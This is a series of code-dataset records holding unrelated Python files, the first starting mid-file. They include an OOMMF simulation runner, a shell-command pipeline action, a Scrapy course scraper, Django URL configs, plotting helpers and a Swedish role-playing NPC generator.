host, \"docker\": docker}\n\n def call(self, argstr, where=None):\n if where is None:\n where = self.where\n if self.statusdict[where]:\n if where == \"host\":\n return self._call_host(argstr=argstr)\n elif where == \"docker\":\n return self._call_docker(argstr=argstr)\n\n def version(self, where=None):\n where = self._where_to_run(where=where)\n p = self.call(argstr=\"+version\", where=where)\n return p.stderr.text.split(\"oommf.tcl\")[-1].strip()\n\n def _where_to_run(self, where):\n if where is None:\n if self.statusdict[\"host\"]:\n return \"host\"\n else:\n return \"docker\"\n else:\n return where\n\n def _call_host(self, argstr):\n oommfpath = os.getenv(self.varname, None)\n cmd = (\"tclsh\", oommfpath, \"boxsi\", \"+fg\",\n argstr, \"-exitondone\", \"1\")\n return self._run_cmd(cmd)\n\n def _call_docker(self, argstr):\n cmd = \"{} pull {}\".format(self.dockername, self.dockerimage)\n self._run_cmd(cmd)\n cmd = (\"{} run -v {}:/io {} /bin/bash -c \\\"tclsh \"\n \"/usr/local/oommf/oommf/oommf.tcl boxsi +fg {} \"\n \"-exitondone 1\\\"\").format(self.dockername, os.getcwd(),\n self.dockerimage, argstr)\n return self._run_cmd(cmd)\n\n def _run_cmd(self, cmd):\n if sys.platform in (\"linux\", \"darwin\"): # Linux and MacOs\n return sarge.capture_both(cmd)\n elif sys.platform.startswith(\"win\"):\n return sarge.run(cmd)\n else:\n msg = (\"Cannot handle platform '{}' - please report to \"\n \"developers\").format(sys.platform) # pragma: no cover\n raise NotImplementedError(msg)\n\n def kill(self, targets=('all',), where=None):\n where = 
self._where_to_run(where)\n print(where)\n if where == 'host':\n oommfpath = os.getenv(self.varname, None)\n sarge.run((\"tclsh\", oommfpath, \"killoommf\") + targets)\n","sub_path":"oommfc/oommf.py","file_name":"oommf.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"396989427","text":"\"\"\"\nExecute a command and produce the execution result\n\"\"\"\nfrom openpipe.pipeline.engine import ActionRuntime\nfrom subprocess import Popen, PIPE\n\n\nclass Action(ActionRuntime):\n\n category = \"Data Sourcing\"\n\n required_config = \"\"\"\n cmd: # The command to be executed\n \"\"\"\n optional_config = \"\"\"\n shell: True # Execute the command as parameters to a system shell\n output_as_text: True # Output the command output as text\n fail_on_error: True # Abort pipeline if exit code is not zero\n \"\"\"\n\n def on_input(self, item):\n new_item = {}\n cmd = self.config[\"cmd\"]\n shell = self.config[\"shell\"]\n process = Popen(\n cmd, shell=shell, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=True\n )\n stdout, stderr = process.communicate()\n if self.config[\"output_as_text\"]:\n if stdout:\n stdout = stdout.decode(\"utf-8\")\n if stderr:\n stderr = stderr.decode(\"utf-8\")\n if process.returncode != 0 and self.config[\"fail_on_error\"]:\n raise Exception(stderr)\n new_item = {\n \"stdout\": stdout,\n \"stderr\": stderr,\n \"return_code\": process.returncode,\n }\n self.put(new_item)\n","sub_path":"openpipe/actions/execute_.py","file_name":"execute_.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"435446681","text":"##############################################################################\n# (c) Crown copyright Met Office. 
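# Editor's sketch of the capture pattern used by the execute_ action above,
# as a standalone snippet: run a command, collect stdout/stderr/return code.
# Standard library only; the command itself is an arbitrary example.
from subprocess import Popen, PIPE

process = Popen('echo hello', shell=True, stdin=PIPE, stdout=PIPE,
                stderr=PIPE, close_fds=True)
stdout, stderr = process.communicate()
result = {
    'stdout': stdout.decode('utf-8'),
    'stderr': stderr.decode('utf-8'),
    'return_code': process.returncode,  # non-zero signals failure
}
assert result['return_code'] == 0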
All rights reserved.\n# For further details please refer to the file COPYRIGHT\n# which you should have received as part of this distribution\n##############################################################################\n'''\nClasses and methods relating to the queue system\n'''\nimport logging\nfrom queue import Empty as QueueEmpty\nfrom typing import List, Dict\nfrom multiprocessing import \\\n Queue, \\\n JoinableQueue, \\\n Process, \\\n Lock, \\\n Manager, \\\n Event\nfrom multiprocessing.synchronize import Lock as LockT\nfrom multiprocessing.synchronize import Event as EventT\n\nfrom fab.artifact import Artifact\nfrom fab.engine import Engine, DiscoveryState\n\n\ndef _worker(queue: JoinableQueue,\n engine: Engine,\n discovery: Dict[str, DiscoveryState],\n objects: List[Artifact],\n lock: LockT,\n stopswitch: EventT):\n while not stopswitch.is_set():\n try:\n artifact = queue.get(block=True, timeout=0.5)\n except QueueEmpty:\n continue\n\n try:\n new_artifacts = engine.process(artifact,\n discovery,\n objects,\n lock)\n\n for new_artifact in new_artifacts:\n queue.put(new_artifact)\n finally:\n queue.task_done()\n\n\nclass QueueManager(object):\n def __init__(self, n_workers: int, engine: Engine):\n self._queue: Queue = JoinableQueue()\n self._n_workers = n_workers\n self._workers: List[int] = []\n self._engine = engine\n self._mgr = Manager()\n self._discovery: Dict[str, DiscoveryState] = self._mgr.dict({})\n self._stopswitch: EventT = Event()\n self._objects: List[Artifact] = self._mgr.list([])\n self._lock = Lock()\n self.logger = logging.getLogger(__name__)\n\n def add_to_queue(self, artifact: Artifact):\n self._queue.put(artifact)\n\n def run(self):\n for _ in range(self._n_workers):\n process = Process(\n target=_worker, args=(self._queue,\n self._engine,\n self._discovery,\n self._objects,\n self._lock,\n self._stopswitch))\n process.start()\n self._workers.append(process)\n\n def check_queue_done(self):\n # Blocks until the JoinableQueue is empty\n self._queue.join()\n\n def shutdown(self):\n # Set the stop switch and wait for workers\n # to finish\n self._stopswitch.set()\n for process in self._workers:\n process.join(10.0)\n\n # Any that didn't finish nicely at this point\n # can be forcibly stopped\n for i_worker, process in enumerate(self._workers):\n if process.is_alive():\n msg = f\"Terminating thread {i_worker}...\"\n self.logger.warn(msg)\n process.terminate()\n\n # Stop the queue\n self._queue.close()\n self._queue.join_thread()\n self._workers.clear()\n","sub_path":"source/fab/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"538100661","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 23 16:24:40 2020\n\n@author: alisha\n\"\"\"\nimport pandas as pd\n\ndef plot_mean_diff_per_sub(df_mean, recog):\n \n t = 'recall'\n \n if recog:\n t = 'recog'\n #colors\n r = [250/255, 103/255, 80/255]\n lb = [167/255, 198/255, 250/255]\n b = [14/255, 72/255, 173/255]\n \n sel = ['rest','video','game']\n ax = df_mean.loc[:,sel].plot.bar(\n title = F'Mean Differences Per Subject -{t} (Reaction times, Session 1)',\n color = [r,lb,b])\n \n ax.set_xlabel('Subjects')\n ax.set_ylabel('Mean differences in time [delayed - immediate]')\n \n\ndef plot_groupmean(means, recog):\n \n t = 'recall'\n \n if recog:\n t = 'recog'\n \n #calculate and plot average of group\n group_mean = pd.DataFrame({'rest': [means['rest'].mean()],\n \n 
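# Editor's minimal sketch of the worker pattern used by fab's QueueManager
# above: poll a JoinableQueue with a timeout, honour a stop Event, and always
# mark items done. Deliberately simplified; not the fab implementation.
from multiprocessing import JoinableQueue, Event, Process

def worker(queue, stop):
    from queue import Empty
    while not stop.is_set():
        try:
            item = queue.get(block=True, timeout=0.5)
        except Empty:
            continue
        try:
            pass  # process the item here
        finally:
            queue.task_done()  # keeps queue.join() accurate

if __name__ == '__main__':
    q, stop = JoinableQueue(), Event()
    p = Process(target=worker, args=(q, stop))
    p.start()
    q.put('job')
    q.join()    # blocks until task_done() has been called for every put()
    stop.set()
    p.join()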
'video':[means['video'].mean()],\n 'game': [means['game'].mean()]})\n group_std = pd.DataFrame({'rest': [means['rest'].std()],\n \n 'video':[means['video'].std()],\n 'game': [means['game'].std()]})\n \n #colors\n r = [250/255, 103/255, 80/255]\n lb = [167/255, 198/255, 250/255]\n b = [14/255, 72/255, 173/255]\n \n ax = group_mean.plot.bar(\n title = F'Mean Differences - {t} (Reaction times, Session 1)',\n yerr = group_std, capsize = 8, \n color = [r,lb,b])\n \n ax.set_xlabel('Conditions')\n ax.set_ylabel('Mean differences [delayed - immediate]')\n# ax.text(0.3,0.3, F'P = {p}')","sub_path":"rt_plot.py","file_name":"rt_plot.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"642614639","text":"#\n\nstream = open(r'./aaa.txt')\n\ncontainer = stream.read()\n\nprint(container)\n\n# open() operations\n\"\"\"\n read reads the whole file \n readline reads one line\n readlines turns the lines into a list\n readable checks whether the stream is readable\n\"\"\"\n\n\"\"\"\nWriting files\n\nmode = w\nmethods:\n write truncates first, then writes\n \n\"\"\"\n\nwith open(r'./aaa.txt', mode='rb') as stream:\n inner = stream.read()\nwith open(r'../day1/aaa.txt', mode='wb') as file:\n file.write(inner)\n","sub_path":"day2/文件操作.py","file_name":"文件操作.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"316835280","text":"import datetime\r\nimport json\r\n\r\ndef createuser():\r\n \"\"\"\r\n Saves information from user input as a dictionary to a JSON file.\r\n \"\"\"\r\n name, phone, city = userinfo()\r\n profile = {'name' : name,\r\n 'phone' : phone,\r\n 'city' : city\r\n }\r\n with open('userprofile.json', 'a') as f:\r\n json.dump(profile, f)\r\n\r\ndef userinfo():\r\n \"\"\"\r\n Record user-entered information.\r\n \"\"\"\r\n name = input('Enter name: ')\r\n phone = int(input('Enter phone number: '))\r\n city = input('Enter city: ')\r\n return name, phone, city\r\n\r\nif __name__ == '__main__':\r\n createuser()\r\n","sub_path":"Weather API SMS/saveuser.py","file_name":"saveuser.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"148505795","text":"\"\"\"mozio URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. 
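# Editor's example expanding on the file-mode notes in 文件操作.py above:
# 'w' truncates before writing; reading can then be done line by line.
# Uses a throwaway demo file name.
with open('demo.txt', 'w') as f:      # truncate, then write
    f.write('first\nsecond\n')
with open('demo.txt') as f:
    assert f.readline() == 'first\n'       # one line at a time
    assert f.readlines() == ['second\n']   # remaining lines as a list
    assert f.readable()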
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\n\nfrom tastypie.api import Api\n\nfrom provider.api.resources import ProviderResource\nfrom servicearea.api.resources import ServiceAreaResource\n\nv1_api = Api(api_name='v1')\nv1_api.register(ProviderResource())\nv1_api.register(ServiceAreaResource())\n\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^api/', include(v1_api.urls)),\n url(r'^api/doc',\n include('tastypie_swagger.urls', namespace='mozioapi_tastypie_swagger'),\n kwargs={\n 'tastypie_api_module': v1_api,\n 'namespace': 'mozioapi_tastypie_swagger',\n 'version': '1.0'\n }\n ),\n]\n","sub_path":"mozio/mozio/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"222191941","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on June 2019\n@author: Thomas Bonald \n@author: Bertrand Charpentier \n@author: Quentin Lutz \n\"\"\"\n\nimport numpy as np\n\n\ndef straight_cut(dendrogram: np.ndarray, n_clusters: int = 2, sorted_clusters: bool = True) -> np.ndarray:\n \"\"\"\n Extract the clustering with given number of clusters from the dendrogram.\n\n Parameters\n ----------\n dendrogram:\n Dendrogram\n n_clusters :\n Number of cluster.\n sorted_clusters :\n If True, sort labels in decreasing order of cluster size.\n\n Returns\n -------\n labels : np.ndarray\n Cluster index of each node.\n \"\"\"\n n_nodes = dendrogram.shape[0] + 1\n if n_clusters < 1 or n_clusters > n_nodes:\n raise ValueError(\"The number of clusters must be between 1 and the number of nodes.\")\n\n labels = np.zeros(n_nodes, dtype=int)\n cluster = {node: [node] for node in range(n_nodes)}\n for t in range(n_nodes - n_clusters):\n cluster[n_nodes + t] = cluster.pop(int(dendrogram[t][0])) + \\\n cluster.pop(int(dendrogram[t][1]))\n\n clusters = list(cluster.values())\n if sorted_clusters:\n clusters = sorted(clusters, key=len, reverse=True)\n for label, index in enumerate(clusters):\n labels[index] = label\n return labels\n","sub_path":"sknetwork/hierarchy/cuts.py","file_name":"cuts.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"599099384","text":"import scrapy\nfrom ..items import Course\n\n\nclass UoGSpider(scrapy.Spider):\n name = 'uog_courses'\n allowed_domains = ['www.gla.ac.uk']\n start_urls = ['http://www.gla.ac.uk/coursecatalogue/browsebysubjectarea/']\n scheme_url = 'http://www.gla.ac.uk'\n\n def parse(self, response):\n for a_element in response.xpath(\"//div[@class='maincontent fullwidth']/ul/li/a\"):\n # get the school title and url to follow\n subject_title = a_element.xpath(\"text()\").extract()[0]\n url = a_element.xpath(\"@href\").extract()[0]\n # create request\n request = scrapy.Request(self.scheme_url + url, callback=self.parse_subject_courses)\n # add this school object and pass it down the chain of processing\n request.meta['subject'] = subject_title.strip()\n yield request\n\n def parse_subject_courses(self, response):\n for a_element in response.xpath(\"//div[@class='maincontent fullwidth']/form[@id='printForm']/div/ul/li/a\"):\n # get the course title and url to follow\n course_title = a_element.xpath(\"text()\").extract()[0]\n url = a_element.xpath(\"@href\").extract()[0]\n # create course object\n this_course = Course()\n this_course['label'] = 
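# Editor's usage example for straight_cut above. Only columns 0 and 1 of the
# dendrogram (the ids of the merged clusters) are read by the function; the
# height and size columns here are illustrative values.
import numpy as np

dendrogram = np.array([[0, 1, 0.5, 2],   # merge leaves 0,1 -> cluster 4
                       [2, 3, 0.6, 2],   # merge leaves 2,3 -> cluster 5
                       [4, 5, 1.0, 4]])  # merge 4,5 -> cluster 6
labels = straight_cut(dendrogram, n_clusters=2)
assert list(labels) == [0, 0, 1, 1]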
course_title.strip().title()\n this_course['subject'] = response.meta['subject']\n this_course['url'] = \"%s%s\" % (self.scheme_url, url)\n # create request\n request = scrapy.Request(self.scheme_url + url, callback=self.parse_course)\n # add this course object and pass it down the chain of processing\n request.meta['course'] = this_course\n yield request\n\n def parse_course(self, response):\n course = response.meta['course']\n desc = ''.join(response.xpath(\"//div[@class='maincontent fullwidth']/div[2]/p[1]/descendant::*/text()\").extract())\n school = response.xpath(\"//div[@class='maincontent fullwidth']/ul/li[2]/text()\").extract()[0]\n level = response.xpath(\"//div[@class='maincontent fullwidth']/ul/li[4]/text()\").extract()[0]\n course['school'] = school\n course['description'] = 'Course at the University of Glasgow'\n course['short_description'] = desc\n course['level'] = level\n return course","sub_path":"collections_manager/factories/uog_courses/scrapers/uog_courses_scraper/spiders/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"440506547","text":"from cs50 import get_string, get_int\n\ndef main():\n # Prompt and validate user input\n while True:\n height = get_int(\"Height: \")\n if (height > 0 and height <= 8):\n break\n \n # Draw the half pyramid\n for line in range(height):\n space = height - line\n while (space > 1):\n print(\" \", end=\"\")\n space -= 1\n for hash in range(line + 1):\n print(\"#\", end=\"\")\n print() \n\nif __name__ == \"__main__\":\n main() \n","sub_path":"Problem Set 6/Mario/mario_less.py","file_name":"mario_less.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"409287130","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('library', '0005_auto_20160204_1250'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='book',\n old_name='no_of_times_issued',\n new_name='total_no_of_times_issued',\n ),\n ]\n","sub_path":"gbpeclibrary/library/migrations/0006_auto_20160204_1254.py","file_name":"0006_auto_20160204_1254.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"267920653","text":"from Products.CMFPlone.URLTool import URLTool\n\nfrom adapters.interfaces import IRequestPortalUrlAnnotator\n\n## XXX PATCH FOR FILERESOURCE, UNTILL ADD 'POST' METHOD OR FIX \n## ResourceRegistries.tools.BaseRegistry.BaseRegistryTool.getResourceContent method\nmarker = []\nfrom Products.Five.browser.resource import FileResource\n\nif getattr(FileResource, 'POST', marker) == marker:\n FileResource.POST = FileResource.GET\n\ndef urltool_call(self, relative=0, *args, **kw):\n \"\"\" Get by default the absolute URL of the portal. 
If the request is annotated, then add a suffix to the portal_url\n \"\"\"\n # print '################################ Called patched portal_url __call__: ' + self.REQUEST.URL\n url_suffix = ''\n if self.REQUEST:\n annotator = IRequestPortalUrlAnnotator(self.REQUEST, None)\n if annotator is not None:\n url_suffix = annotator.getPortalUrlSuffix(default=marker)\n if not url_suffix == marker:\n return url_suffix\n return self.getPortalObject().absolute_url(relative=relative)\n\ndef urltool_getPortalPath(self):\n \"\"\" Get the portal object's URL without the server URL component.\n \"\"\"\n\n url_suffix = ''\n if self.REQUEST:\n annotator = IRequestPortalUrlAnnotator(self.REQUEST, None)\n if annotator is not None:\n url_suffix = annotator.getPortalUrlSuffix()\n # print '############ Added suffix to portal_url: ' + url_suffix\n\n return '/'.join(self.getPortalObject().getPhysicalPath()) + url_suffix\n\nURLTool.__call__ = urltool_call\n#URLTool.getPortalPath = urltool_getPortalPath\n","sub_path":"qLocalSkin/trunk/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"471389206","text":"from django.conf.urls import url\nfrom . import views\n\napp_name = 'mugsandcups'\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^catalog/$', views.catalog, name='catalog'),\n url(r'^about/$', views.about, name='about'),\n url(r'^contact/$', views.contact, name='contact'),\n\n]","sub_path":"mugsandcups/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"269187781","text":"#!/usr/bin/env python3\n#\n# Copyright (c) 2016-present, Facebook, Inc.\n# All rights reserved.\n#\n# This source code is licensed under the BSD-style license found in the\n# LICENSE file in the root directory of this source tree. 
An additional grant\n# of patent rights can be found in the PATENTS file in the same directory.\n\nimport abc\nimport os\nimport typing\n\n\nclass EnvironmentVariableMixin(metaclass=abc.ABCMeta):\n def set_environment_variable(self, name: str, value: str) -> None:\n self.__add_cleanup_for_environment_variable(name)\n os.environ[name] = value\n\n def unset_environment_variable(self, name: str) -> None:\n self.__add_cleanup_for_environment_variable(name)\n del os.environ[name]\n\n def __add_cleanup_for_environment_variable(self, name: str) -> None:\n old_value = os.getenv(name)\n\n def restore() -> None:\n if old_value is None:\n del os.environ[name]\n else:\n os.environ[name] = old_value\n\n self.addCleanup(restore)\n\n def addCleanup(\n self,\n function: typing.Callable[..., typing.Any],\n *args: typing.Any,\n **kwargs: typing.Any\n ) -> None:\n raise NotImplementedError()\n","sub_path":"eden/integration/lib/environment_variable.py","file_name":"environment_variable.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"414030478","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nstores classes with logic for display of traits and using points\n\"\"\"\n\nimport random\nfrom .randweight import randweight\nimport app.traits as traits\nimport app.weights as weightsmodule\nfrom .avrunda import avrunda\nimport importlib\nfrom app import db, models\nfrom .hedtypes import agecats, age_mods\n\nclass Npc:\n def trace(self, trait, change):\n if trait in self.trace_buys.keys():\n self.trace_buys[trait] += change\n else:\n self.trace_buys[trait] = change\n\n def use_points(self, trait):\n if self.points_left >= traits.costs[trait]:\n if trait in traits.doubles:\n for i in traits.doubles[trait]:\n self.traits[i] += 1\n self.points_left -= traits.costs[trait]\n self.trace_buys.append({'trait':trait,\n 'cost':traits.costs[trait],\n 'points left':self.points_left})\n #self.trace(trait, 1) # trace buys\n elif trait in ['Bas', 'Skol', 'Yrke']:\n self.traits[trait] += 1\n self.points_left -= traits.costs[trait]\n self.trace_buys.append({'trait':trait,\n 'cost':traits.costs[trait],\n 'points left':self.points_left})\n #self.trace(trait, 1)\n if trait == 'Skol':\n if self.traits[trait] % 3 == 0:\n if self.points_left >= traits.costs['Special_skol']:\n self.traits['Special_skol'] += 1\n self.points_left -= traits.costs['Special_skol']\n self.trace_buys.append({'trait':'Special_skol',\n 'cost':traits.costs['Special_skol'],\n 'points left':self.points_left})\n #self.trace('Special_skol', 1)\n else: pass\n else: pass\n elif trait == 'Yrke':\n if self.traits[trait] % 3 == 0:\n if self.points_left >= traits.costs['Special_yrke']:\n self.traits['Special_yrke'] += 1\n self.points_left -= traits.costs['Special_yrke']\n self.trace_buys.append({'trait':'Special_yrke',\n 'cost':traits.costs['Special_yrke'],\n 'points left':self.points_left})\n #self.trace('Special_yrke', 1)\n else: pass\n else: pass\n elif trait == 'Special_hobb':\n self.traits[trait] += 1\n self.points_left -= traits.costs[trait]\n self.trace_buys.append({'trait':'Special_hobb',\n 'cost':traits.costs['Special_hobb'],\n 'points left':self.points_left})\n #self.trace(trait, 1)\n else: pass\n else: pass\n\n \n \n def dist_points(self):\n path = self.weights\n while self.points_left > 1:\n mainweights = {key:path[key]['main'] for key in path.keys()}\n main = randweight(mainweights)\n if sum(path[main]['sub'].values()) != 0:\n subweights = path[main]['sub']\n sub = 
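# Editor's usage sketch for EnvironmentVariableMixin above: combined with a
# unittest.TestCase (which supplies addCleanup), the mixin restores the old
# value automatically. Test class and variable name are hypothetical.
import os
import unittest

class ExampleTest(unittest.TestCase, EnvironmentVariableMixin):
    def test_sets_and_restores(self):
        self.set_environment_variable('EDEN_DEMO_VAR', 'on')
        self.assertEqual(os.environ['EDEN_DEMO_VAR'], 'on')
        # the cleanup registered by the mixin runs after the test and
        # removes or restores EDEN_DEMO_VAR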
randweight(subweights)\n self.use_points(sub)\n if self.points_left == 1 and self.weights['Färdigheter']['sub']['Special_hobb'] != 0:\n self.use_points('Special_hobb')\n\n def move_sliders(self):\n for i in ['fys_ment','konst_rörl','snabb_uth','finm_grovm','perc_konc',\n 'prak_teor','log_emo']:\n n = randweight({0:25, 1:20, 2:5, 3:1})\n for t in traits.sliders[i]:\n if n >= self.traits[t]:\n n = self.traits[t] - 1\n if n != 0:\n if i == 'fys_ment':\n plus = randweight(weightsmodule.fys_ment[self.start_values['Yrke']])\n fys_mod = 1 if plus == 'Fysisk' else -1\n ment_mod = fys_mod * -1\n while n > 0:\n change_fys = random.choice(['konst_rörl','snabb_uth','finm_grovm'])\n for i in traits.doubles[change_fys]:\n self.traits[i] += (1 * fys_mod)\n change_ment = random.choice(['perc_konc','prak_teor','log_emo'])\n for i in traits.doubles[change_ment]:\n self.traits[i] += (1 * ment_mod)\n self.trace_buys.append({'fys_ment':{change_fys:(fys_mod),\n change_ment:(ment_mod)}})\n n -= 1\n else:\n direction = random.choice(['höger', 'vänster'])\n if direction == 'höger':\n self.traits[traits.doubles[i][0]] += n \n self.traits[traits.doubles[i][1]] -= n\n else:\n self.traits[traits.doubles[i][0]] -= n\n self.traits[traits.doubles[i][1]] += n\n self.trace_buys.append({'slider':i,\n 'direction':direction,\n 'n':n})\n else: pass\n\n for i in traits.senses:\n n = randweight({0:240, 1:20, 2:5, 3:1})\n sign = random.choice([1, -1])\n self.traits[i] += (n * sign)\n self.points_left += (n * sign * -1 * traits.costs[i])\n if n != 0:\n self.trace_buys.append({'slider':i,\n 'n':(n*sign),\n 'points_left':self.points_left})\n \n \n\n def level_specials(self, n):\n specs = ['Special_skol', 'Special_yrke']\n if self.weights['Färdigheter']['sub']['Special_hobb'] != 0:\n specs.append['Special_hobb']\n for i in range(n):\n trait = random.choice(specs)\n self.traits[trait] += 1\n self.trace_buys.append('level special: %s' % trait)\n \n\n def calc_skills(self):\n skills = {}\n for i in traits.skills_bases.keys():\n x = traits.skills_bases[i][0]\n y = traits.skills_bases[i][1]\n skills[i] = self.traits[x] + self.traits[y]\n return skills\n\n def calc_hitpoints(self):\n hp = {}\n k = self.traits['Konstitution'] - 1\n hp['Huvud'] = int(2 + k/2)\n for i in ['Hals', 'Vänster fot', 'Höger fot']:\n hp[i] = int(1 + k/3)\n for i in ['Vänster axel', 'Höger axel']:\n hp[i] = int(4 + k/2)\n hp['Bröstkorg'] = int(4.5 + k/2)\n for i in ['Vänster överarm', 'Höger överarm']:\n hp[i] = int(2.5 + k/2)\n for i in ['Mage', 'Vänster lår', 'Höger lår']:\n hp[i] = int(3 + k/3)\n for i in ['Vänster underarm', 'Höger underarm']:\n hp[i] = int(1.5 + k/2)\n for i in ['Vänster hand', 'Höger hand']:\n hp[i] = int(1 + k/5)\n hp['Höft'] = int(4 + k/3)\n for i in ['Vänster smalben', 'Höger smalben']:\n hp[i] = int(2 + k/3)\n return hp\n\n def calc_iv(self):\n base = self.traits['Snabbhet']\n if base == 1:\n iv = 24\n elif base == 2:\n iv = 27\n elif base > 5:\n iv = 30 + (base - 5) * 3\n else:\n iv = 30\n for i in ['Perception', 'Koncentration', 'Praktisk', 'Emotionell']:\n iv += self.traits[i]\n return iv\n\n def calc_move_carry(self):\n res = {}\n res['Normal förflyttning'] = self.start_values['Längd'] * 0.65 / 100\n s, u = self.traits['Snabbhet'], self.traits['Rörlighet']\n res['Sprint'] = (s + u) / 2 * res['Normal förflyttning']\n res['Jogg'] = res['Sprint'] / 2\n res['Normal / 8 h'] = res['Normal förflyttning'] * 3600 * 8 / 1000\n res['Maximal förflyttning'] = self.traits['Uthållighet'] * 5 / 2 * 10\n res['Normal bärförmåga'] = 
self.traits['Konstitution'] + self.traits['Uthållighet']\n res['Maximal bärförmåga'] = res['Normal bärförmåga'] * 15\n return res\n ##### Must use string formatting to display correct decimals #####\n\n def round_move_carry(self):\n res = {}\n for i in self.move_carry['exakt']:\n res[i] = avrunda(i, self.move_carry['exakt'][i])\n return res\n \n\n def __init__(self, start_values, weights, char_traits, points):\n self.trace_buys = [('create char',points)] # to trace what's been bought\n self.start_values = start_values\n self.weights = weights\n self.traits = char_traits\n self.points_left = points\n self.move_sliders()\n self.dist_points()\n self.level_specials(self.start_values['Nivå'] - 1)\n self.skills = self.calc_skills()\n self.hitpoints = self.calc_hitpoints()\n self.traits['Total IV'] = self.calc_iv()\n self.move_carry = {'exakt': {}, 'avrundat': {}}\n self.move_carry['exakt'] = self.calc_move_carry()\n self.move_carry['avrundat'] = self.round_move_carry()\n\n def toDict(self):\n return {'trace_buys':str(self.trace_buys),\n 'start_values':self.start_values,\n 'weights':self.weights,\n 'traits':self.traits,\n 'points_left':self.points_left,\n 'skills':self.skills,\n 'hitpoints':self.hitpoints,\n 'move_carry':self.move_carry,\n 'name':'',\n 'campaign':'',\n 'notes':''}\n \n\n def ding(self, lvls, years):\n self.trace_buys.append('DING: %s levels, %s years' % (lvls, years))\n oldlvl = self.start_values['Nivå']\n newlvl = oldlvl + int(lvls)\n oldage = self.start_values['Ålder']\n newage = oldage + int(years)\n points = 0\n if newage != oldage:\n old_age_points = int(avrunda(None, oldage/4))\n new_age_points = int(avrunda(None, newage/4))\n points += (new_age_points - old_age_points)\n self.start_values['Ålder'] = newage\n oldagecat = self.start_values['Ålderskategori']\n cats = dict(agecats[self.start_values['Ras']])\n if newage <= cats['Ung']:\n newagecat = 'Ung'\n elif newage <= cats['Mogen']:\n newagecat = 'Mogen'\n elif newage <= cats['Medel']:\n newagecat = 'Medel'\n elif newage <= cats['Gammal']:\n newagecat = 'Gammal'\n else:\n newagecat = 'Åldring'\n if newagecat != oldagecat:\n self.trace_buys.append('Ändra ålderskategori: %s => %s' % (oldagecat, newagecat))\n self.change_agecat(oldagecat, newagecat)\n self.start_values['Ålderskategori'] = newagecat\n if newlvl != oldlvl:\n points += int(lvls) * 4\n if oldlvl == 1:\n points += 2\n self.start_values['Nivå'] = newlvl\n self.points_left += points\n self.trace_buys.append('Sparade poäng: +%s' % points)\n self.dist_points()\n self.level_specials(int(lvls))\n self.skills = self.calc_skills()\n self.hitpoints = self.calc_hitpoints()\n self.traits['Total IV'] = self.calc_iv()\n self.move_carry['exakt'] = self.calc_move_carry()\n self.move_carry['avrundat'] = self.round_move_carry()\n\n def change_agecat(self, old, new):\n for i in age_mods[old]:\n self.traits[i] += (age_mods[old][i] * -1)\n self.trace_buys.append('%s: %s' % (i, age_mods[old][i]*-1))\n for i in age_mods[new]:\n self.traits[i] += age_mods[new][i]\n self.trace_buys.append('%s: %s' % (i, age_mods[new][i]))\n\n \nclass LoadNpc(Npc):\n def __init__(self, values, user):\n self.id = values['id']\n self.timestamp = values['timestamp']\n self.trace_buys = values['trace_buys']\n self.start_values = values['start_values']\n self.weights = values['weights']\n self.traits = values['traits']\n self.points_left = values['points_left']\n self.skills = values['skills']\n self.hitpoints = values['hitpoints']\n self.move_carry = values['move_carry']\n self.campaign = values['campaign']\n 
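# restore the remaining free-form fields (notes and name) exactly as they were saved\n 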
